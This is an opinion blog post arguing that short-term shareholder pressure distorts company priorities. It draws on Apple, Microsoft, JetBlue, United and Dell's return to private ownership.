I’m not a big fan of the stock market – especially on short-term investments. I’m okay with you getting a return on a longer-term investment that you’ve held while a company grows. I think market pressures can lead a company to prioritize and deemphasize the wrong things just to appease the vocal masses. Fire a CEO and lose their institutional knowledge? SURE! (Not that every CEO change is all good or all bad.) Give you the cash instead of investing it in new products, technologies, people and processes to grow the business? SURE! But I’m really not a fan of fair-weather shareholders coming along and pushing for cash back on an investment they just made. Employees sweat their asses off for years building the business in order to get equity that takes years again to vest, and shareholders get the cash for doing almost nothing. Alrighty then. That makes sense.

While Tim Cook has taken some steps to appease certain drive-by activist investors who bloviate about wanting more cash through more significant dividends or bigger buybacks, he has pushed back as well, and has also been explicitly outspoken when people challenge the company’s priorities.

One can argue that Microsoft’s flat stock price from 2001-2013 was the cause of the reprioritization and capitulation to investors, but one can also argue that significant holdings by executives could also have tainted the priorities to focus on shareholder innovation shareholder value.

While Microsoft’s financial results do generally continue to move in a positive direction, I personally worry that too much of that growth could be coming in part with price increases, not with net-new sales. It’s always hard to decode which is which, as prices have generally been rising, and underlying numbers generating them aren’t always terrifically clear to decode (I’m being kind).

As organizations grow, and sales get tight, you have two choices to make money. You 1) get new customers, or 2) charge your existing customers more.

The first position is easy, as long as you’re experiencing organic sales to new customers, or you’re adding new products and services that don’t completely replace, but can and likely do erode, prior products in order to deliver longer-term growth opportunities for the business as a whole.

Most companies, over time, plateau and move into the second position and have to tighten the belt. It just happens. There’s just only so far you can go in terms of obtaining new customers for your existing products and services or building new products and services that risk your existing lines. This is far from unique to Microsoft. It’s a common occurrence. As this article in The New Yorker shows, United is doing this as well (and they’re certainly not alone). Even JetBlue is facing the music and chopping up their previously equitable seating plans to accommodate a push for earnings growth.

Read that last section quoting Hayes very carefully again: “long-term plan to drive shareholder returns through new and existing initiatives.” and “We believe the plan laid out today benefits our three key stakeholders … It delivers improved, sustainable profitability for our investors, the best travel experience for our customers and ensures a strong, healthy company for our crewmembers.”

Just breathe in those priorities for a moment. It’s not about the customers that pay the bills (and he left out “our highest paying” in the statement about customers). It’s not about the employees that keep the planes flying and on time. Nope. It’s about shareholder value. Effectively all about shareholder value. I would argue those priorities are completely ass-backwards. I’m also not sure I concur that it ensures a strong, healthy company for the long term, either. JetBlue has many dedicated fliers due to the distinct premium, but price-conscious product it has delivered from the beginning. JetBlue will find themselves with great difficulty retaining existing customers. Sure, they’ll make money. But a lot of people who used to prefer JetBlue are now likely to not be so preferential.

My personal opinion is that Michael Dell is spot on – the benefit of being a private company is that, now that he survived the ordeal of re-privatizing his company, he can ignore the market at large, and do what’s best for the company. Rather than focusing on short-term goals quarter to quarter, and worrying about a certain year’s fourth quarter being slightly down over the previous year’s, he, his leadership team, and his employees can focus on building products and services that customers will buy because they solve a problem for them.

I worry about a world where the “effectiveness” of a CEO is in any way judged by the stock price. It’s a bullshit measurement. Price growth doesn’t gauge whether the company will be alive or dead in 5, 10, or 15 years. It doesn’t gauge whether a CEO is willing to put a product line on a funeral pyre so a new one can grow in it’s place. Most importantly, it doesn’t gauge whether a company’s sales pipeline is organically growing or not in any form.

When you focus on just pleasing the cacaphony of shareholders, you get hung up on driving earnings up at all costs. This is the price a public company faces.

When you focus on just driving earnings up at all costs, you get hung up on driving numbers that may well not be in line with the long-term goals of your company. This is the price a public company faces.

Build great products and services. Kick ass. Take names. Watch customers buy your tools to solve their problems. When shareholders with no immediate concern for your company other than how you’ll pad their wallet come knocking, as long as you’re making a profit, invest that cash in future growth for your company, and tell them you’re too busy building great things to talk.